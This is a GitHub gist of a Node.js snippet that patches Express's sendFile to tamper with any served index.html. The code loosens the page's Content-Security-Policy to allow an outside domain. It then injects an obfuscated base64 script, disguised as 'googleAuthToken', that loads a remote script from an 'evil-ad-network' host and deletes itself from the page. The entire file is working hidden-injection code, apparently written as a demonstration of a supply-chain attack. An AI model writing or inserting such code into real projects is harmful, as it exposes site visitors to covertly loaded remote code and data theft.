Last active
October 8, 2021 06:14
-
-
Save davidgilbertson/202c4f535b8f9ddf84696935eb220de3 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const fs = require('fs'); | |
const express = require('express'); | |
let indexHtml; | |
const originalResponseSendFile = express.response.sendFile; | |
express.response.sendFile = function(path, options, callback) { | |
if (path.endsWith('index.html')) { | |
// add my domain to the content security policy | |
let csp = express.response.get.call(this, 'Content-Security-Policy') || ''; | |
csp = csp.replace('connect-src ', 'connect-src https://adxs-network-live.com '); | |
express.response.set.call(this, 'Content-Security-Policy', csp); | |
// inject a cheeky little self-destructing script | |
if (!indexHtml) { | |
indexHtml = fs.readFileSync(path, 'utf8'); | |
const script = ` | |
<script> | |
var googleAuthToken = document.createElement('script'); | |
googleAuthToken.textContent = atob('CiAgICAgICAgY29uc3Qgc2NyaXB0RWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBzY3JpcHRFbC5zcmMgPSAnaHR0cHM6Ly9ldmlsLWFkLW5ldHdvcms/YWRfdHlwZT1tZWRpdW0nOwogICAgICAgIGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoc2NyaXB0RWwpOwogICAgICAgIHNjcmlwdEVsLnJlbW92ZSgpOyAvLyByZW1vdmUgdGhlIHNjcmlwdCB0aGF0IGZldGNoZXMKICAgICAgICBkb2N1bWVudC5zY3JpcHRzW2RvY3VtZW50LnNjcmlwdHMubGVuZ3RoIC0gMV0ucmVtb3ZlKCk7IC8vIHJlbW92ZSB0aGlzIHNjcmlwdAogICAgICAgIGRvY3VtZW50LnNjcmlwdHNbZG9jdW1lbnQuc2NyaXB0cy5sZW5ndGggLSAxXS5yZW1vdmUoKTsgLy8gYW5kIHRoZSBvbmUgdGhhdCBjcmVhdGVkIGl0CiAgICA='); | |
document.body.appendChild(googleAuthToken); | |
</script> | |
`; | |
indexHtml = indexHtml.replace('</body>', `${script}</body>`); | |
} | |
express.response.send.call(this, indexHtml); | |
} else { | |
originalResponseSendFile.call(this, path, options, callback); | |
} | |
}; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment